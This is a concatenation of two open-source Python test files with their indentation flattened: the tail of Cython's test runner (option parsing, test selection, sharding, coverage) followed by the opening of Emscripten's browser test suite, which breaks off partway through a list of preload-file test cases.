# deps: { version : matcher func }
from sys import version_info
self.exclude_matchers = []
for ver, (compare, matcher) in deps.items():
if compare(version_info, ver):
self.exclude_matchers.append(matcher)
self.tests_missing_deps = []
def __call__(self, testname, tags=None):
for matcher in self.exclude_matchers:
if matcher(testname):
self.tests_missing_deps.append(testname)
return True
return False
class FileListExcluder(object):
def __init__(self, list_file, verbose=False):
self.verbose = verbose
self.excludes = {}
self._list_file = os.path.relpath(list_file)
with open(list_file) as f:
for line in f:
line = line.strip()
if line and line[0] != '#':
self.excludes[line.split()[0]] = True
def __call__(self, testname, tags=None):
exclude = any(string_selector(ex)(testname) for ex in self.excludes)
if exclude and self.verbose:
print("Excluding %s because it's listed in %s"
% (testname, self._list_file))
return exclude
class TagsSelector(object):
def __init__(self, tag, value):
self.tag = tag
self.value = value
def __call__(self, testname, tags=None):
if tags is None:
return False
else:
return self.value in tags[self.tag]
class RegExSelector(object):
def __init__(self, pattern_string):
try:
self.regex_matches = re.compile(pattern_string, re.I|re.U).search
except re.error:
print('Invalid pattern: %r' % pattern_string)
raise
def __call__(self, testname, tags=None):
return self.regex_matches(testname)
def string_selector(s):
if ':' in s:
return TagsSelector(*s.split(':', 1))
else:
return RegExSelector(s)
class ShardExcludeSelector(object):
# This is an exclude selector so it can override the (include) selectors.
# It may not provide uniform distribution (in time or count), but is a
# determanistic partition of the tests which is important.
# Random seed to improve the hash distribution.
_seed = base64.b64decode(b'2ged1EtsGz/GkisJr22UcLeP6n9XIaA5Vby2wM49Wvg=')
def __init__(self, shard_num, shard_count):
self.shard_num = shard_num
self.shard_count = shard_count
def __call__(self, testname, tags=None, _hash=zlib.crc32, _is_py2=IS_PY2):
# Cannot use simple hash() here as shard processes might use different hash seeds.
# CRC32 is fast and simple, but might return negative values in Py2.
hashval = _hash(self._seed + testname) & 0x7fffffff if _is_py2 else _hash(self._seed + testname.encode())
return hashval % self.shard_count != self.shard_num
class PendingThreadsError(RuntimeError):
pass
threads_seen = []
def check_thread_termination(ignore_seen=True):
if threading is None: # no threading enabled in CPython
return
current = threading.current_thread()
blocking_threads = []
for t in threading.enumerate():
if not t.is_alive() or t == current or t.name == 'time_stamper':
continue
t.join(timeout=2)
if t.is_alive():
if not ignore_seen:
blocking_threads.append(t)
continue
for seen in threads_seen:
if t is seen:
break
else:
threads_seen.append(t)
blocking_threads.append(t)
if not blocking_threads:
return
sys.stderr.write("warning: left-over threads found after running test:\n")
for t in blocking_threads:
sys.stderr.write('...%s\n' % repr(t))
raise PendingThreadsError("left-over threads found after running test")
def subprocess_output(cmd):
try:
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
return p.communicate()[0].decode('UTF-8')
except OSError:
return ''
def get_version():
from Cython.Compiler.Version import version as cython_version
full_version = cython_version
top = os.path.dirname(os.path.abspath(__file__))
if os.path.exists(os.path.join(top, '.git')):
old_dir = os.getcwd()
try:
os.chdir(top)
head_commit = subprocess_output(['git', 'rev-parse', 'HEAD']).strip()
version_commit = subprocess_output(['git', 'rev-parse', cython_version]).strip()
diff = subprocess_output(['git', 'diff', '--stat']).strip()
if head_commit != version_commit:
full_version += " " + head_commit
if diff:
full_version += ' + uncommitted changes'
finally:
os.chdir(old_dir)
return full_version
_orig_stdout, _orig_stderr = sys.stdout, sys.stderr
def flush_and_terminate(status):
try:
_orig_stdout.flush()
_orig_stderr.flush()
finally:
os._exit(status)
def main():
global DISTDIR, WITH_CYTHON
# Set an environment variable to the top directory
os.environ['CYTHON_PROJECT_DIR'] = os.path.abspath(os.path.dirname(__file__))
DISTDIR = os.path.join(os.getcwd(), os.path.dirname(sys.argv[0]))
from Cython.Compiler import DebugFlags
args = []
for arg in sys.argv[1:]:
if arg.startswith('--debug') and arg[2:].replace('-', '_') in dir(DebugFlags):
setattr(DebugFlags, arg[2:].replace('-', '_'), True)
else:
args.append(arg)
from optparse import OptionParser
parser = OptionParser()
parser.add_option("--no-cleanup", dest="cleanup_workdir",
action="store_false", default=True,
help="do not delete the generated C files (allows passing --no-cython on next run)")
parser.add_option("--no-cleanup-sharedlibs", dest="cleanup_sharedlibs",
action="store_false", default=True,
help="do not delete the generated shared library files (allows manual module experimentation)")
parser.add_option("--no-cleanup-failures", dest="cleanup_failures",
action="store_false", default=True,
help="enable --no-cleanup and --no-cleanup-sharedlibs for failed tests only")
parser.add_option("--no-cython", dest="with_cython",
action="store_false", default=True,
help="do not run the Cython compiler, only the C compiler")
parser.add_option("--compiler", dest="compiler", default=None,
help="C compiler type")
backend_list = ','.join(BACKENDS)
parser.add_option("--backends", dest="backends", default=backend_list,
help="select backends to test (default: %s)" % backend_list)
parser.add_option("--no-c", dest="use_c",
action="store_false", default=True,
help="do not test C compilation backend")
parser.add_option("--no-cpp", dest="use_cpp",
action="store_false", default=True,
help="do not test C++ compilation backend")
parser.add_option("--no-unit", dest="unittests",
action="store_false", default=True,
help="do not run the unit tests")
parser.add_option("--no-doctest", dest="doctests",
action="store_false", default=True,
help="do not run the doctests")
parser.add_option("--no-file", dest="filetests",
action="store_false", default=True,
help="do not run the file based tests")
parser.add_option("--no-pyregr", dest="pyregr",
action="store_false", default=True,
help="do not run the regression tests of CPython in tests/pyregr/")
parser.add_option("--no-examples", dest="examples",
action="store_false", default=True,
help="Do not run the documentation tests in the examples directory.")
parser.add_option("--no-code-style", dest="code_style",
action="store_false", default=True,
help="Do not run the code style (PEP8) checks.")
parser.add_option("--cython-only", dest="cython_only",
action="store_true", default=False,
help="only compile pyx to c, do not run C compiler or run the tests")
parser.add_option("--no-refnanny", dest="with_refnanny",
action="store_false", default=True,
help="do not regression test reference counting")
parser.add_option("--no-fork", dest="fork",
action="store_false", default=True,
help="do not fork to run tests")
parser.add_option("--sys-pyregr", dest="system_pyregr",
action="store_true", default=False,
help="run the regression tests of the CPython installation")
parser.add_option("-x", "--exclude", dest="exclude",
action="append", metavar="PATTERN",
help="exclude tests matching the PATTERN")
parser.add_option("--listfile", dest="listfile",
action="append",
help="specify a file containing a list of tests to run")
parser.add_option("-j", "--shard_count", dest="shard_count", metavar="N",
type=int, default=1,
help="shard this run into several parallel runs")
parser.add_option("--shard_num", dest="shard_num", metavar="K",
type=int, default=-1,
help="test only this single shard")
parser.add_option("--profile", dest="profile",
action="store_true", default=False,
help="enable profiling of the tests")
parser.add_option("-C", "--coverage", dest="coverage",
action="store_true", default=False,
help="collect source coverage data for the Compiler")
parser.add_option("--coverage-xml", dest="coverage_xml",
action="store_true", default=False,
help="collect source coverage data for the Compiler in XML format")
parser.add_option("--coverage-html", dest="coverage_html",
action="store_true", default=False,
help="collect source coverage data for the Compiler in HTML format")
parser.add_option("-A", "--annotate", dest="annotate_source",
action="store_true", default=True,
help="generate annotated HTML versions of the test source files")
parser.add_option("--no-annotate", dest="annotate_source",
action="store_false",
help="do not generate annotated HTML versions of the test source files")
parser.add_option("-v", "--verbose", dest="verbosity",
action="count", default=0,
help="display test progress, pass twice to print test names")
parser.add_option("-T", "--ticket", dest="tickets",
action="append",
help="a bug ticket number to run the respective test in 'tests/*'")
parser.add_option("-k", dest="only_pattern",
help="a regex pattern for selecting doctests and test functions in the test modules")
parser.add_option("-3", dest="language_level",
action="store_const", const=3, default=2,
help="set language level to Python 3 (useful for running the CPython regression tests)'")
parser.add_option("--xml-output", dest="xml_output_dir", metavar="DIR",
help="write test results in XML to directory DIR")
parser.add_option("--exit-ok", dest="exit_ok", default=False,
action="store_true",
help="exit without error code even on test failures")
parser.add_option("--failfast", dest="failfast", default=False,
action="store_true",
help="stop on first failure or error")
parser.add_option("--root-dir", dest="root_dir", default=os.path.join(DISTDIR, 'tests'),
help=("Directory to look for the file based "
"tests (the ones which are deactivated with '--no-file'."))
parser.add_option("--examples-dir", dest="examples_dir",
default=os.path.join(DISTDIR, 'docs', 'examples'),
help="Directory to look for documentation example tests")
parser.add_option("--work-dir", dest="work_dir", default=os.path.join(os.getcwd(), 'TEST_TMP'),
help="working directory")
parser.add_option("--cython-dir", dest="cython_dir", default=os.getcwd(),
help="Cython installation directory (default: use local source version)")
parser.add_option("--debug", dest="for_debugging", default=False, action="store_true",
help="configure for easier use with a debugger (e.g. gdb)")
parser.add_option("--pyximport-py", dest="pyximport_py", default=False, action="store_true",
help="use pyximport to automatically compile imported .pyx and .py files")
parser.add_option("--watermark", dest="watermark", default=None,
help="deterministic generated by string")
parser.add_option("--use_common_utility_dir", default=False, action="store_true")
parser.add_option("--use_formal_grammar", default=False, action="store_true")
parser.add_option("--test_determinism", default=False, action="store_true",
help="test whether Cython's output is deterministic")
parser.add_option("--pythran-dir", dest="pythran_dir", default=None,
help="specify Pythran include directory. This will run the C++ tests using Pythran backend for Numpy")
parser.add_option("--no-capture", dest="capture", default=True, action="store_false",
help="do not capture stdout, stderr in srctree tests. Makes pdb.set_trace interactive")
parser.add_option("--limited-api", dest="limited_api", default=False, action="store_true",
help="Compiles Cython using CPython's LIMITED_API")
options, cmd_args = parser.parse_args(args)
if options.with_cython and sys.version_info[0] >= 3:
sys.path.insert(0, options.cython_dir)
# requires glob with the wildcard.
if sys.version_info < (3, 5) or cmd_args:
options.code_style = False
WITH_CYTHON = options.with_cython
coverage = None
if options.coverage or options.coverage_xml or options.coverage_html:
if not WITH_CYTHON:
options.coverage = options.coverage_xml = options.coverage_html = False
elif options.shard_num == -1:
print("Enabling coverage analysis")
from coverage import coverage as _coverage
coverage = _coverage(branch=True)
coverage.erase()
coverage.start()
if options.xml_output_dir:
shutil.rmtree(options.xml_output_dir, ignore_errors=True)
if options.listfile:
for listfile in options.listfile:
cmd_args.extend(load_listfile(listfile))
if options.capture and not options.for_debugging:
keep_alive_interval = 10
else:
keep_alive_interval = None
if options.shard_count > 1 and options.shard_num == -1:
if "PYTHONIOENCODING" not in os.environ:
# Make sure subprocesses can print() Unicode text.
os.environ["PYTHONIOENCODING"] = sys.stdout.encoding or sys.getdefaultencoding()
import multiprocessing
pool = multiprocessing.Pool(options.shard_count)
tasks = [(options, cmd_args, shard_num) for shard_num in range(options.shard_count)]
error_shards = []
failure_outputs = []
# NOTE: create process pool before time stamper thread to avoid forking issues.
total_time = time.time()
stats = Stats()
with time_stamper_thread(interval=keep_alive_interval):
for shard_num, shard_stats, return_code, failure_output in pool.imap_unordered(runtests_callback, tasks):
if return_code != 0:
error_shards.append(shard_num)
failure_outputs.append(failure_output)
sys.stderr.write("FAILED (%s/%s)\n" % (shard_num, options.shard_count))
sys.stderr.write("ALL DONE (%s/%s)\n" % (shard_num, options.shard_count))
stats.update(shard_stats)
pool.close()
pool.join()
total_time = time.time() - total_time
sys.stderr.write("Sharded tests run in %d seconds (%.1f minutes)\n" % (round(total_time), total_time / 60.))
if error_shards:
sys.stderr.write("Errors found in shards %s\n" % ", ".join([str(e) for e in error_shards]))
for failure_output in zip(error_shards, failure_outputs):
sys.stderr.write("\nErrors from shard %s:\n%s" % failure_output)
return_code = 1
else:
return_code = 0
else:
with time_stamper_thread(interval=keep_alive_interval):
_, stats, return_code, _ = runtests(options, cmd_args, coverage)
if coverage:
if options.shard_count > 1 and options.shard_num == -1:
coverage.combine()
coverage.stop()
stats.print_stats(sys.stderr)
if coverage:
save_coverage(coverage, options)
sys.stderr.write("ALL DONE\n")
sys.stderr.flush()
try:
check_thread_termination(ignore_seen=False)
except PendingThreadsError:
# normal program exit won't kill the threads, do it the hard way here
flush_and_terminate(return_code)
else:
sys.exit(return_code)
@contextmanager
def time_stamper_thread(interval=10):
"""
Print regular time stamps into the build logs to find slow tests.
@param interval: time interval in seconds
"""
if not interval or interval < 0:
# Do nothing
yield
return
try:
_xrange = xrange
except NameError:
_xrange = range
import threading
import datetime
from time import sleep
interval = _xrange(interval * 4)
now = datetime.datetime.now
stop = False
# We capture stderr in some places.
# => make sure we write to the real (original) stderr of the test runner.
stderr = os.dup(2)
def write(s):
os.write(stderr, s if type(s) is bytes else s.encode('ascii'))
def time_stamper():
while True:
for _ in interval:
if stop:
return
sleep(1./4)
write('\n#### %s\n' % now())
thread = threading.Thread(target=time_stamper, name='time_stamper')
thread.setDaemon(True) # Py2 ...
thread.start()
try:
yield
finally:
stop = True
thread.join()
os.close(stderr)
def configure_cython(options):
global CompilationOptions, pyrex_default_options, cython_compile
from Cython.Compiler.Options import \
CompilationOptions, \
default_options as pyrex_default_options
from Cython.Compiler.Options import _directive_defaults as directive_defaults
from Cython.Compiler import Errors
Errors.LEVEL = 0 # show all warnings
from Cython.Compiler import Options
Options.generate_cleanup_code = 3 # complete cleanup code
from Cython.Compiler import DebugFlags
DebugFlags.debug_temp_code_comments = 1
pyrex_default_options['formal_grammar'] = options.use_formal_grammar
if options.profile:
directive_defaults['profile'] = True
if options.watermark:
import Cython.Compiler.Version
Cython.Compiler.Version.watermark = options.watermark
def save_coverage(coverage, options):
if options.coverage:
coverage.report(show_missing=0)
if options.coverage_xml:
coverage.xml_report(outfile="coverage-report.xml")
if options.coverage_html:
coverage.html_report(directory="coverage-report-html")
def runtests_callback(args):
options, cmd_args, shard_num = args
options.shard_num = shard_num
return runtests(options, cmd_args)
def runtests(options, cmd_args, coverage=None):
# faulthandler should be able to provide a limited traceback
# in the event of a segmentation fault. Hopefully better than Travis
# just keeping running until timeout. Only available on Python 3.3+
try:
import faulthandler
except ImportError:
pass # OK - not essential
else:
faulthandler.enable()
if sys.platform == "win32" and sys.version_info < (3, 6):
# enable Unicode console output, if possible
try:
import win_unicode_console
except ImportError:
pass
else:
win_unicode_console.enable()
WITH_CYTHON = options.with_cython
ROOTDIR = os.path.abspath(options.root_dir)
WORKDIR = os.path.abspath(options.work_dir)
if WITH_CYTHON:
configure_cython(options)
xml_output_dir = options.xml_output_dir
if options.shard_num > -1:
WORKDIR = os.path.join(WORKDIR, str(options.shard_num))
if xml_output_dir:
xml_output_dir = os.path.join(xml_output_dir, 'shard-%03d' % options.shard_num)
# RUN ALL TESTS!
UNITTEST_MODULE = "Cython"
UNITTEST_ROOT = os.path.join(os.path.dirname(__file__), UNITTEST_MODULE)
if WITH_CYTHON:
if os.path.exists(WORKDIR):
for path in os.listdir(WORKDIR):
if path in ("support", "Cy3"): continue
shutil.rmtree(os.path.join(WORKDIR, path), ignore_errors=True)
if not os.path.exists(WORKDIR):
os.makedirs(WORKDIR)
if options.shard_num <= 0:
sys.stderr.write("Python %s\n" % sys.version)
sys.stderr.write("\n")
if WITH_CYTHON:
sys.stderr.write("Running tests against Cython %s\n" % get_version())
else:
sys.stderr.write("Running tests without Cython.\n")
if options.for_debugging:
options.cleanup_workdir = False
options.cleanup_sharedlibs = False
options.fork = False
if WITH_CYTHON and include_debugger:
from Cython.Compiler.Options import default_options as compiler_default_options
compiler_default_options['gdb_debug'] = True
compiler_default_options['output_dir'] = os.getcwd()
if IS_PYPY:
if options.with_refnanny:
sys.stderr.write("Disabling refnanny in PyPy\n")
options.with_refnanny = False
if options.with_refnanny:
from pyximport.pyxbuild import pyx_to_dll
libpath = pyx_to_dll(os.path.join("Cython", "Runtime", "refnanny.pyx"),
build_in_temp=True,
pyxbuild_dir=os.path.join(WORKDIR, "support"))
sys.path.insert(0, os.path.split(libpath)[0])
CDEFS.append(('CYTHON_REFNANNY', '1'))
if options.limited_api:
CFLAGS.append("-DCYTHON_LIMITED_API=1")
CFLAGS.append('-Wno-unused-function')
if xml_output_dir and options.fork:
# doesn't currently work together
sys.stderr.write("Disabling forked testing to support XML test output\n")
options.fork = False
if WITH_CYTHON:
sys.stderr.write("Using Cython language level %d.\n" % options.language_level)
test_bugs = False
if options.tickets:
for ticket_number in options.tickets:
test_bugs = True
cmd_args.append('ticket:%s' % ticket_number)
if not test_bugs:
for selector in cmd_args:
if selector.startswith('bugs'):
test_bugs = True
selectors = [ string_selector(r) for r in cmd_args ]
verbose_excludes = selectors or options.verbosity >= 2
if not selectors:
selectors = [ lambda x, tags=None: True ]
# Check which external modules are not present and exclude tests
# which depends on them (by prefix)
missing_dep_excluder = MissingDependencyExcluder(EXT_DEP_MODULES)
version_dep_excluder = VersionDependencyExcluder(VER_DEP_MODULES)
exclude_selectors = [missing_dep_excluder, version_dep_excluder] # want to print msg at exit
try:
import IPython.core.release
if list(IPython.core.release._ver) < [1, 0, 0]:
raise ImportError
except (ImportError, AttributeError, TypeError):
exclude_selectors.append(RegExSelector('IPython'))
try:
raise ImportError("Jedi typer is currently broken, see GH#1845")
import jedi
if not ([0, 9] <= list(map(int, re.findall('[0-9]+', jedi.__version__ or '0')))):
raise ImportError
except (ImportError, AttributeError, TypeError):
exclude_selectors.append(RegExSelector('Jedi'))
if options.exclude:
exclude_selectors += [ string_selector(r) for r in options.exclude ]
if not COMPILER_HAS_INT128 or not IS_CPYTHON:
exclude_selectors += [RegExSelector('int128')]
if options.shard_num > -1:
exclude_selectors.append(ShardExcludeSelector(options.shard_num, options.shard_count))
if not test_bugs:
bug_files = [
('bugs.txt', True),
('pypy_bugs.txt', IS_PYPY),
('pypy2_bugs.txt', IS_PYPY and IS_PY2),
('pypy_crash_bugs.txt', IS_PYPY),
('pypy_implementation_detail_bugs.txt', IS_PYPY),
('limited_api_bugs.txt', options.limited_api),
('windows_bugs.txt', sys.platform == 'win32'),
('cygwin_bugs.txt', sys.platform == 'cygwin')
]
exclude_selectors += [
FileListExcluder(os.path.join(ROOTDIR, bugs_file_name),
verbose=verbose_excludes)
for bugs_file_name, condition in bug_files if condition
]
global COMPILER
if options.compiler:
COMPILER = options.compiler
selected_backends = [ name.strip() for name in options.backends.split(',') if name.strip() ]
backends = []
for backend in selected_backends:
if backend == 'c' and not options.use_c:
continue
elif backend == 'cpp' and not options.use_cpp:
continue
elif backend not in BACKENDS:
sys.stderr.write("Unknown backend requested: '%s' not one of [%s]\n" % (
backend, ','.join(BACKENDS)))
sys.exit(1)
backends.append(backend)
if options.shard_num <= 0:
sys.stderr.write("Backends: %s\n" % ','.join(backends))
languages = backends
if 'TRAVIS' in os.environ and sys.platform == 'darwin' and 'cpp' in languages:
bugs_file_name = 'travis_macos_cpp_bugs.txt'
exclude_selectors += [
FileListExcluder(os.path.join(ROOTDIR, bugs_file_name),
verbose=verbose_excludes)
]
if options.use_common_utility_dir:
common_utility_dir = os.path.join(WORKDIR, 'utility_code')
if not os.path.exists(common_utility_dir):
os.makedirs(common_utility_dir)
else:
common_utility_dir = None
sys.stderr.write("\n")
test_suite = unittest.TestSuite()
stats = Stats()
if options.unittests:
collect_unittests(UNITTEST_ROOT, UNITTEST_MODULE + ".", test_suite, selectors, exclude_selectors)
if options.doctests:
collect_doctests(UNITTEST_ROOT, UNITTEST_MODULE + ".", test_suite, selectors, exclude_selectors)
if options.filetests and languages:
filetests = TestBuilder(ROOTDIR, WORKDIR, selectors, exclude_selectors,
options, options.pyregr, languages, test_bugs,
options.language_level, common_utility_dir,
options.pythran_dir, add_embedded_test=True, stats=stats)
test_suite.addTest(filetests.build_suite())
if options.examples and languages:
examples_workdir = os.path.join(WORKDIR, 'examples')
for subdirectory in glob.glob(os.path.join(options.examples_dir, "*/")):
filetests = TestBuilder(subdirectory, examples_workdir, selectors, exclude_selectors,
options, options.pyregr, languages, test_bugs,
options.language_level, common_utility_dir,
options.pythran_dir,
default_mode='compile', stats=stats)
test_suite.addTest(filetests.build_suite())
if options.system_pyregr and languages:
sys_pyregr_dir = os.path.join(sys.prefix, 'lib', 'python'+sys.version[:3], 'test')
if not os.path.isdir(sys_pyregr_dir):
sys_pyregr_dir = os.path.join(os.path.dirname(sys.executable), 'Lib', 'test') # source build
if os.path.isdir(sys_pyregr_dir):
filetests = TestBuilder(ROOTDIR, WORKDIR, selectors, exclude_selectors,
options, True, languages, test_bugs,
sys.version_info[0], common_utility_dir, stats=stats)
sys.stderr.write("Including CPython regression tests in %s\n" % sys_pyregr_dir)
test_suite.addTest(filetests.handle_directory(sys_pyregr_dir, 'pyregr'))
if options.code_style and options.shard_num <= 0:
try:
import pycodestyle
except ImportError:
# Hack to make the exclusion visible.
missing_dep_excluder.tests_missing_deps.append('TestCodeFormat')
else:
test_suite.addTest(TestCodeFormat(options.cython_dir))
if xml_output_dir:
from Cython.Tests.xmlrunner import XMLTestRunner
if not os.path.exists(xml_output_dir):
try:
os.makedirs(xml_output_dir)
except OSError:
pass # concurrency issue?
test_runner = XMLTestRunner(output=xml_output_dir,
verbose=options.verbosity > 0)
if options.failfast:
sys.stderr.write("--failfast not supported with XML runner\n")
else:
text_runner_options = {}
if options.failfast:
text_runner_options['failfast'] = True
test_runner = unittest.TextTestRunner(verbosity=options.verbosity, **text_runner_options)
if options.pyximport_py:
from pyximport import pyximport
pyximport.install(pyimport=True, build_dir=os.path.join(WORKDIR, '_pyximport'),
load_py_module_on_import_failure=True, inplace=True)
try:
gc.set_debug(gc.DEBUG_UNCOLLECTABLE)
except AttributeError:
pass # not available on PyPy
result = test_runner.run(test_suite)
if common_utility_dir and options.shard_num < 0 and options.cleanup_workdir:
shutil.rmtree(common_utility_dir)
if missing_dep_excluder.tests_missing_deps:
sys.stderr.write("Following tests excluded because of missing dependencies on your system:\n")
for test in missing_dep_excluder.tests_missing_deps:
sys.stderr.write(" %s\n" % test)
if options.with_refnanny:
import refnanny
sys.stderr.write("\n".join([repr(x) for x in refnanny.reflog]))
result_code = 0 if options.exit_ok else not result.wasSuccessful()
if xml_output_dir:
failure_output = ""
else:
failure_output = "".join(collect_failure_output(result))
return options.shard_num, stats, result_code, failure_output
def collect_failure_output(result):
"""Extract test error/failure output from a TextTestResult."""
failure_output = []
for flavour, errors in (("ERROR", result.errors), ("FAIL", result.failures)):
for test, err in errors:
failure_output.append("%s\n%s: %s\n%s\n%s\n" % (
result.separator1,
flavour, result.getDescription(test),
result.separator2,
err))
return failure_output
if __name__ == '__main__':
try:
main()
except Exception:
traceback.print_exc()
try:
check_thread_termination(ignore_seen=False)
except PendingThreadsError:
# normal program exit won't kill the threads, do it the hard way here
flush_and_terminate(1)
sys.exit(1)
|
test_browser.py
|
# coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import argparse
import json
import multiprocessing
import os
import random
import shlex
import shutil
import subprocess
import time
import unittest
import webbrowser
import zlib
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import urlopen
from runner import BrowserCore, RunnerCore, path_from_root, has_browser, EMTEST_BROWSER, Reporting
from runner import create_file, parameterized, ensure_dir, disabled, test_file, WEBIDL_BINDER
from tools import building
from tools import shared
from tools import system_libs
from tools.shared import EMCC, WINDOWS, FILE_PACKAGER, PIPE
from tools.shared import try_delete, config
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
s.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if s.path == '/':
s.sendheaders()
elif not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
def shell_with_script(shell_file, output_file, replacement):
with open(path_from_root('src', shell_file)) as input:
with open(output_file, 'w') as output:
output.write(input.read().replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chrome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def is_firefox():
return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower()
def no_firefox(note='firefox is not supported'):
if is_firefox():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
assert callable(f)
def decorated(self):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self)
return decorated
def requires_threads(f):
assert callable(f)
def decorated(self, *args, **kwargs):
if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
return f(self, *args, **kwargs)
return decorated
def requires_asmfs(f):
assert callable(f)
def decorated(self, *args, **kwargs):
# https://github.com/emscripten-core/emscripten/issues/9534
self.skipTest('ASMFS is looking for a maintainer')
return f(self, *args, **kwargs)
return decorated
# Today we only support the wasm backend so any tests that is disabled under the llvm
# backend is always disabled.
# TODO(sbc): Investigate all tests with this decorator and either fix of remove the test.
def no_wasm_backend(note=''):
assert not callable(note)
return unittest.skip(note)
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas")
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
super(browser, cls).setUpClass()
cls.browser_timeout = 60
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def setUp(self):
super(BrowserCore, self).setUp()
# avoid various compiler warnings that many browser tests currently generate
self.emcc_args += [
'-Wno-pointer-sign',
'-Wno-int-conversion',
]
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
# system JS libraries are no longer automatically linked to anymore.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL', '-lGL']) # is the default anyhow
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = 'src.cpp'
html_file = 'src.html'
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
self.compile_btest(['src.cpp', '-o', 'src.html', '-gsource-map'])
self.assertExists(html_file)
self.assertExists('src.wasm.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with EMTEST_SAVE_DIR=1 for the reload).
''')
def test_emscripten_log(self):
self.btest_exit(test_file('emscripten_log', 'emscripten_log.cpp'),
args=['--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-gsource-map'])
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
open(absolute_src_path3, 'w').write('''load me right before running the code please''')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT(result);
return 0;
}
''' % path)
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
